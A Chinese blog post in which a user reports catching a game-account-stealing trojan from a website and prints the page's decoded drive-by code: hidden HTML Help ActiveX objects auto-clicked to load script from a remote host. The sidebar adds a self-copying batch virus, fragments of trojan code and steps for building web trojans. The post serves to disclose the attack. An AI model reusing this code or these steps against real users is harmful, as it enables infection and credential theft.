追查到的某网页木马代码

最新推荐文章于 2022-01-21 21:34:32 发布
最新推荐文章于 2022-01-21 21:34:32 发布
阅读量1.2k 收藏
点赞数
分类专栏: 安全 文章标签: command object
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liswa/article/details/646413
版权
找一个很旧的软件的最新版本时,到其网页后因发觉自己的电脑中招了,我可是winxp+sp2,让其上网自动更新的啊,而且安装了Norton,照样让木马给运行了,后来分析,是一个魔兽世界的盗号木马,分析后清楚倒不难(讨厌的是,它居然试图注入了我的大部分在运行进程,累我电脑重启了)
分析其网页代码,剥离解码后,得到的代码如下:
//=================================================
              <center><font color=red>对不起,您访问的页面不存在!</font><center>
              <SCRIPT language=VScript src="zlongyao.gif"></SCRIPT>
              <SCRIPT language=VScript src="zlongyao.exe">
              </SCRIPT><HTML><BODY><div style="display:none">
              <OBJECT id="news784" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
                <PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl">
                <PARAM name="Item1" value='command;/windows/help/apps.chm'></OBJECT>
                <OBJECT id="news458" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
                <PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl">
                <PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"http://8.71z.cn/zlongyao.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div>
                <SCRIPT>news784.Click();setTimeout("news458.Click();",0);</SCRIPT>
//=====================================================================
看来是运行了不少东西,暂且记下,以后有空再作分析。              
liswa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
杨秀璋的专栏
11-01 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Web渗透的第一步工作,涉及网站信息、域名信息、端口信息、敏感信息及指纹信息收集。这篇文章换个口味,将分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。
黑客术语
05-19 5727
系统篇肉鸡肉鸡就是具有最高管理权限的远程电脑。简单的说就是受你控制的远程电脑。肉鸡可以是win、Unix/Linux……等各种系统;肉鸡可以是一家公司的服务器,一家网站的服务器,甚至是美国白宫或军方的电脑,只要你有这本事入侵并控制他,要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。3389、4899肉鸡3389是Windows终端服务(Terminal Services)所默认使用的端...
木马病毒代码
m0_65955912的博客
01-21 1万+
这个病毒的功能是删除当前目录下.cpp类型的代码。 copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" copy %0 d:\ copy %0 e:\ del *.cpp attrib +h %0 1.病毒启动测试: copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
木马代码
weixin_30312563的博客
06-04 969
第一个反弹木马代码代码 #include #include #include #include #include #include #include void usage();char shell[]="/bin/sh";char message[]="s8s8 welcome\n";int so...
无dll无进程木马代码
benny5609的专栏
02-27 1107
#include//#include#include#include#pragma comment(lib,"Shlwapi.lib")//参数结构 ;typedef struct _RemotePara{DWORD dwLoadLibrary;DWORD dwFreeLibrary;DWORD dwGetProcAddress;DWORD dwGetModuleHandle;DWORD dwWS
网页木马太猖獗-网马反击战
weixin_34356555的博客
05-08 357
【标题】国家环保总局官方网站疑似被挂马—网页木马【内容】         前段时间,我们的品牌通 联系通 等网站相继遭遇网页木马,深受其害。今天,无意中发现国家环保总局官方网站疑似被挂马。 现象截图:             网页木马相关技术总结:网页木马代码大全:一:框架挂马   &lt;iframe src=地址 width=0 height=0&gt;&lt;/iframe&gt; 二:js...
dll插入系统进程的源码
神经网络爱好者
06-03 1285
//Header #include "bkdlldata.h" #include #include #include #include #include //--------------------------------------------------------------------- //Global constant char SERVICENAME[9] = "windh
系统分析师学习笔记(十九)
cecily044的博客
05-11 4026
系统安全性分析与设计 信息系统安全体系 目前,信息安全威胁主要有以下几个方面: (1)系统稳定性和可靠性破坏行为,包括从外部网络针对内部网络的攻击入侵行为和病毒破坏等。 (2)大量信息设备的使用、维护和管理问题,包括违反规定的计算机、打印机和其他信息基础设施滥用,以及信息系统违规使用软件和硬件的行为。 (3)知识产权和内部机密材料等信息存储、使用和传输的保密性、完整性和可靠性存在可能的威胁,其中尤其以信息的保密性存在威胁的可能性最大。 1.系统安全的分类 信息系统的安全是一个复杂的综合体,涉及到系统的方方
信息安全工程师第二版考试总结+笔记
IT技术
11-29 2万+
信息安全工程师第二版考试总结+笔记
WireShark案例分析
Libra_Ng
11-22 2741
路由器错配故障分析 故障现象 服务器A,B共处于同一个子网内,会出现A可以和B通信,而B有时却不能和A通信,经检查发现在子网掩码配置时,两个服务器为下图所示: 网络中主机之间的基本通信可以分为两种类型: 同一网络内主机间的通信:数据可以直接发送给对方,不需借助网关. 不同网络之间的主机通信:数据必须先发送给网关,然后再通过网关转发给对方. 故障分析 从A到B的通信:A的子网掩码255.255....
网页木马代码清除工具
06-04
使用说明: 1 选择要清理的目录,该工具可查找指定目录下(包括子目录)所有符合条件的文件。 2 指定匹配正则表达式,你可以直接复制木马代码,如“<iframe src=http://xxx.mmma.biz/ps.htm width=0 height=0></iframe>”。或使用正则来匹配各种样本。 3 替换表达式一般为空,也可以填写你想要替换的内容。 4 操作的文件类型:你要操作的文件扩展名,用|隔开,注意前面不要漏了"."符号。 5 测试文本:对你设定的正则表达式的测试。 建议指定正则表达式后将网页样本复制到测试文本框中进行测试,确认无误后点击“开始清理”,即可执行清理工作了。 本工具需要.net Framework 2.0支持 作者blog:http://blog.orgact.com/leisang/archive/2007/11/09/00000002.html 参考资料: http://www.putiji.net/?p=124
网页木马扫描器
02-25
web网页木马后门扫描器内置多种挂马特征库,能够轻松扫描出电脑中的web网页木马,如asp\php\jsp\pl\图片木马等等,保护网站安全。
网页木马
言出必行
05-16 3503
当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,反查杀手段不断升级,新的病毒层出不穷,形式也越来越多样化,为了躲避查杀,病毒自身的隐蔽性越来越高,针对反病毒软件对传统的病毒传播途径的监控能力提高,造成病毒传播困难的问题,越来越多的病毒,利用多数反病毒软件产品对恶意脚本监控能力的缺陷,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来传播
打造终极网页木马,值得一读!
07-08 6716
打造终极网页木马,值得一读!    如果你打开此页看到了类似下面的这个程序窗口,那我就“恭喜”你有“洞洞”了^O^请注意:此文章发表于04年7月份,到目前为止,文章中所描述的木马已能被所有的杀毒软件成功杀除。而且微软也相继推出了各个OS版本下的针对此漏洞的补丁,所以此木马已基本失效,请各位网友不要再进行尝试。继续放在这里只是为了提供有兴趣的网友学习测试。    
打造完美的IE网页木马
zhcool(碳元素)的专栏
10-24 1532
(测试页面:http://www.godog.y365.com/runexe/icyfox.htm,此处所运行的程序不是木马!)   既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个完美的IE网页木马至少应具备下列四项特征:   一:可以躲过杀毒软件的追杀;   二:可以避开网络防火墙的报警;   三:能够适用于多数的WINDOWS操作系统(主要包括WIN98、WI
VC++ 很简单的木马代码
j123kaishichufa的专栏
04-09 1922
<br />Visual C++编程时用到了这些功能,现在我把它组装成一个很简单的木马了. <br />  本代码已封装成类方便代码重用 :1,自我复制.2,修改注册表自动运行.3,关闭进程.4,启动程序.5,重启关机功能.<br />  交流<br />  class CTrojanHorse<br />  {<br />  public://add code<br />  public://add code<br />  CTrojanHorse();<br />  ~CTrojanHorse();<
一个 简单的cmd 木马(源代码)
热门推荐
tony的专栏
10-25 4万+
一个 简单的cmd 木马(源代码) // woodtc.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include "WoodSMTP.h"#define BUFFER_SIZE 1024typedef struct{HANDLE hPipe;SOCKET sC
c语言木马程序,网上看到的一个用C语言编写的木马源程序代码大家一起学学
weixin_39653764的博客
05-17 969
c程序源码以下是在网上看到的一个用C语言编写的木马源程序代码大家一起学学#include#pragma comment(lib,"ws2_32.lib")#include#include #pragma comment(lib,"Shlwapi.lib")#include #include #include //参数结构 ;typedef struct _RemotePara{DWORD dwLo...
网页木马是怎么制作的
靡不有初,鲜克有终
06-27 1605
我只知道5944空间木马的制作方法 先申请一个FTP空间,然后用木马生成器生成一个木马,然后放在FTP里面(一定要免杀),然后记住这个FTP地址再加你木马名称,先复制起来,再下载个网马生成器,在网马生成器里面输入你刚才复制的地址,然后生成,生成出来的网页文件再复制到你刚才放木马的地址里面,一定要在同一个目录,然后就可以了,地址就是你FTP的地址加你网马的名称ftp://xxxx.xxxx/xxx.
我想创建一个交换机报警记录的网页,以后可以追查此记录。请问怎么描述
最新发布
03-07
您需要定义一个数据库来存储报警记录,并编写代码来将报警信息添加到数据库中。然后,您可以编写代码来检索和显示报警记录,并在网页上创建一个表格或列表来显示它们。最后,您可以添加搜索和过滤功能,以便用户可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值